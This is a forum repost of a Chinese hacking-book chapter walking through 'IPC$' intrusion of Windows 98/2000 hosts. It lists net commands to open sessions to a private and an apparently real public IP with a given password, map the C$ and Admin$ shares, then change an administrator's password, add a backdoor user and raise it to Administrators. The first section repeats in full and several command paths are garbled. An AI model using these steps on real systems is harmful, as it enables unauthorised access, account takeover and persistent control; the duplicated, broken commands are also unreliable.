title="评分 0" href="***;tid=1170655&pid=16144826">
IPC$漏洞入侵
IPC$漏洞入侵(也就是系统默认共享Hvachen注)
IPC$入侵为入侵者最常见的入侵方式,也可以说所有最基层的入侵都是在IPC$的入侵上开始的。
IPC是Internet Process Connection的缩写,IPC$是共享"命名管道"的资源,它对于程序间的通信很重要。在远程管理和查看计算机的共享资源时使用。利用IPC$入侵者可以与目
标主机建立一个空的连接(无需用户名与密码)或是根据其口令建立远程连接,如果在没有服务器上用户信息的情况下,可以利用建立空的连接得到目标主机上的用户列表。比如国
内的著名扫描软件“流光”就是根据IPC$建立空连接得到用户列表,还可以配合字典,进行密码尝试。远程主机和目标主机可以建立空连接,从而加大了计算机被攻击的指数。
由于NT系统在默认安装的情况下,每个分区存在隐藏共享,即为"盘符$"与"Admin$"(即:System32),当删除其共享时,再次开机又自动地设为共享,如何永久删除其共享,请参阅
4.2.2章节。
6.1.1 基于IPC$初级入侵
1. 测试所用工具:
Windows 9x下的MS-DOS 或Windows 2000下的命令提示符(cmd.exe)
2. Windows 98下的入侵测试
由于Windows 9x下的net命令功能没有像在Windows NT/2000下那么强大,所以在入侵前要在Windows 9x登录对话框中对用户名和密码进行更改。
目标服务器地址:192.168.0.78
用户名:Administrator
密码:ffhh.net
(1) 登录Windows 98到桌面时,会出现【请输入网络密码】对话框,在该对话框中将用户名输入为Administraotr,密码输入为ffhh.net,如图6-1所示。
图6-1 变更Windows 98登录用户名及密码
(2) 单击【确定】按钮,会出现【设置Windows密码】对话框,接着系统会让用户再确认一次密码,在【确认新密码】文本框中再次输入ffhh.net,如图6-2所示。
图6-2 次输入新密码
(3) 单击【确定】按钮,进入Windows 98桌面,运行MS-DOS程序。
(4) 提示符下输入如下命令:
net use \192.168.0.78ipc$
输入完毕后按下Enter键,将出现如图6-3所示画面,并显示The command Was completed successfully (命令成功完成),此时便和192.168.0.78建立了远程连接。
图6-3 目标机建立远程连接
(5) 192.168.0.78上的C盘映射到本地为X盘,输入如下命令:
net use x: \192.168.0.78c$
输入完毕后按Enter键,接着系统会出现命令成功完成的英文字符,如图6-4所示。
图6-4 映射远程硬盘
此时双击打开【我的电脑】,可以看到目标机192.168.0.78上的C盘已映射成为本地的X盘,如图6-5所示。
图6-5 目标C盘映射到本地为X盘
(6) 双击打开X盘,就可看到192.168.0.78上C盘上所有内容,如图6-6所示的画面,此时已完全控制了目标机。
图6-5 目标机上的C盘内容
(7) 此时在MSDOS下输入如下命令后就可以看到与目标盘的连接:
net use
输入完毕后按Enter键,即可看到如图6-7所示的画面。
图6-7 显示本机与目标机的连接
(8) 由于Windows 98提示符下的命令没有NT下那么的强大,例如没有AT等一些命令,但Windows 98也可以使用部分的命令,例如查看远程计算机时间的:net time [url=file://
\IP]\IP[/url]命令。查看192.168.0.78上现在的时间,在MSDOS下输入如下命令格式:
net time \192.168.0.78
输入完毕后,即可以看到192.168.0.78上现在的时间,如图6-8所示。
图6-8 查看目标服务器上的时间
(9) 测试成功完成。
注:
● 如果出现如图1-8所示的画面,说明用户名及密码输入有误或是目标服务器没有该共享。
图6-9 建立远程连接时出现错误
● 如果目标服务器口令为空,在登录Windows 98时出现的对话框中将密码设为空 即可。
3. Windows 2000下的入侵测试
目标服务器地址:61.150.115.9
用户名:system32
密码:ffhh.net
(1) 打开命令提示符,即Windows 2000下的cmd.exe程序。
(2) 在命令提示符下输入如下命令:
net use \61.150.115.9ipc$ ffhh.net /user:administroat
输入完毕后按Enter键,出现如图6-10所示的图面,并显示命令成功完成。
图6-10 与目标机建立远程连接
(3) 将61.150.115.9上的System32文件夹(即Admin$共享)映射到本地为Y盘,输入如下命令:
net use y: \61.150.115.9admin$
输入完毕后按Enter键,接着系统会出现命令成功完成字样,如图6-11所示。
图6-11 映射目标机System32文件夹
此时双击打开【我的电脑】,可以看到目标机61.150.115.7上的System32文件夹下已映射成为本地的Y盘,如图6-12所示。
图6-12 目标System32文件夹映射到本地为Y盘
(4) 双击打开Y盘,就可看到61.150.115.9上System32文件下所有内容,如图6-13所示的图面,
6.1 IPC$漏洞入侵
IPC$入侵为入侵者最常见的入侵方式,也可以说所有最基层的入侵都是在IPC$的入侵上开始的。
IPC是Internet Process Connection的缩写,IPC$是共享"命名管道"的资源,它对于程序间的通信很重要。在远程管理和查看计算机的共享资源时使用。利用IPC$入侵者可以与目
标主机建立一个空的连接(无需用户名与密码)或是根据其口令建立远程连接,如果在没有服务器上用户信息的情况下,可以利用建立空的连接得到目标主机上的用户列表。比如国
内的著名扫描软件“流光”就是根据IPC$建立空连接得到用户列表,还可以配合字典,进行密码尝试。远程主机和目标主机可以建立空连接,从而加大了计算机被攻击的指数。
由于NT系统在默认安装的情况下,每个分区存在隐藏共享,即为"盘符$"与"Admin$"(即:System32),当删除其共享时,再次开机又自动地设为共享,如何永久删除其共享,请参阅
4.2.2章节。
6.1.1 基于IPC$初级入侵
1. 测试所用工具:
Windows 9x下的MS-DOS 或Windows 2000下的命令提示符(cmd.exe)
2. Windows 98下的入侵测试
由于Windows 9x下的net命令功能没有像在Windows NT/2000下那么强大,所以在入侵前要在Windows 9x登录对话框中对用户名和密码进行更改。
目标服务器地址:192.168.0.78
用户名:Administrator
密码:ffhh.net
(1) 登录Windows 98到桌面时,会出现【请输入网络密码】对话框,在该对话框中将用户名输入为Administraotr,密码输入为ffhh.net,如图6-1所示。
图6-1 变更Windows 98登录用户名及密码
(2) 单击【确定】按钮,会出现【设置Windows密码】对话框,接着系统会让用户再确认一次密码,在【确认新密码】文本框中再次输入ffhh.net,如图6-2所示。
图6-2 次输入新密码
(3) 单击【确定】按钮,进入Windows 98桌面,运行MS-DOS程序。
(4) 提示符下输入如下命令:
net use \192.168.0.78ipc$
输入完毕后按下Enter键,将出现如图6-3所示画面,并显示The command Was completed successfully (命令成功完成),此时便和192.168.0.78建立了远程连接。
图6-3 目标机建立远程连接
(5) 192.168.0.78上的C盘映射到本地为X盘,输入如下命令:
net use x: \192.168.0.78c$
输入完毕后按Enter键,接着系统会出现命令成功完成的英文字符,如图6-4所示。
图6-4 映射远程硬盘
此时双击打开【我的电脑】,可以看到目标机192.168.0.78上的C盘已映射成为本地的X盘,如图6-5所示。
图6-5 目标C盘映射到本地为X盘
(6) 双击打开X盘,就可看到192.168.0.78上C盘上所有内容,如图6-6所示的画面,此时已完全控制了目标机。
图6-5 目标机上的C盘内容
(7) 此时在MSDOS下输入如下命令后就可以看到与目标盘的连接:
net use
输入完毕后按Enter键,即可看到如图6-7所示的画面。
图6-7 显示本机与目标机的连接
(8) 由于Windows 98提示符下的命令没有NT下那么的强大,例如没有AT等一些命令,但Windows 98也可以使用部分的命令,例如查看远程计算机时间的:net time [url=file://
\IP]\IP[/url]命令。查看192.168.0.78上现在的时间,在MSDOS下输入如下命令格式:
net time \192.168.0.78
输入完毕后,即可以看到192.168.0.78上现在的时间,如图6-8所示。
图6-8 查看目标服务器上的时间
(9) 测试成功完成。
注:
● 如果出现如图1-8所示的画面,说明用户名及密码输入有误或是目标服务器没有该共享。
图6-9 建立远程连接时出现错误
● 如果目标服务器口令为空,在登录Windows 98时出现的对话框中将密码设为空 即可。
3. Windows 2000下的入侵测试
目标服务器地址:61.150.115.9
用户名:system32
密码:ffhh.net
(1) 打开命令提示符,即Windows 2000下的cmd.exe程序。
(2) 在命令提示符下输入如下命令:
net use \61.150.115.9ipc$ ffhh.net /user:administroat
输入完毕后按Enter键,出现如图6-10所示的图面,并显示命令成功完成。
图6-10 与目标机建立远程连接
(3) 将61.150.115.9上的System32文件夹(即Admin$共享)映射到本地为Y盘,输入如下命令:
net use y: \61.150.115.9admin$
输入完毕后按Enter键,接着系统会出现命令成功完成字样,如图6-11所示。
图6-11 映射目标机System32文件夹
此时双击打开【我的电脑】,可以看到目标机61.150.115.7上的System32文件夹下已映射成为本地的Y盘,如图6-12所示。
图6-12 目标System32文件夹映射到本地为Y盘
(4) 双击打开Y盘,就可看到61.150.115.9上System32文件下所有内容
6.1.3 基于IPC$高级入侵
6.1.2小节讲述了通过NCX99建立远程登录,接下来将看看入侵者利用远程登录能做些什么?
注意:
本节前提是已远程登录到服务器。
入侵测试:
测试主机:61.150.115.9
(1) 查看目标机所有用户列表,在远程的命令提示符下运行如下命令格式:
net user
输入完毕后按Enter键,系统便会列出用户列表,如图6-22所示。
图6-22 列出目标机的用户列表
(2) 查看某个用户信息,在远程的命令提示符下运行如下命令格式:
net user system32
命令解释:
查看用户名为system32的用户属性。
输入完毕后按Enter键,接着系统会列出该用户的一些信息,如图6-23所示。
图6-23 列出用户system32的信息
从本地组会员中可以看出该用户隶属于Administrators组,也就是超级用户,对计算机有完全操作的权力。
(3) 入侵者还可以更改用户密码,在命令提示符下输入如下格式:
net user system32 hacker1219
命令解释:
将用户名system32的密码更改为:hacker1219。
输入完毕后按Enter键,接着会显示命令成功完成,如图6-24所示。
图6-24 更改用户密码
(4) 在目标机上添加用户可以在命令提示符下输入如下格式:
net user admin system /add
命令解释:
添加一个用户名为system的用户,并设密码为system。
输入完毕后按Enter键,接着会显示命令成功完成,如图6-25所示。
图6-25 向目标服务器添加用户
刚添加的用户Admin隶属于Users组,使用如下命令查看:
net user admin
输入完毕后按Enter键,如图6-26所示。
图6-26 查看用户Admin的属性
(5) 在远程登录目标机后提升用户权限时可在命令提示符下输入如下格式:
net localgroup administrators admin /add
命令解释:
将用户Admin添加到Administrators组里。
输入完毕后按Enter键,接着会显示命令成功完成,如图6-27所示。
图6-27 提升用户权限
(6) 如果需要在远程登录目标机后删除用户可在命令提示符下输入如下格式命令:
net user admin /delete
命令解释:
删除用户Admin。
输入完毕后按Enter键,接着会显示命令成功完成
0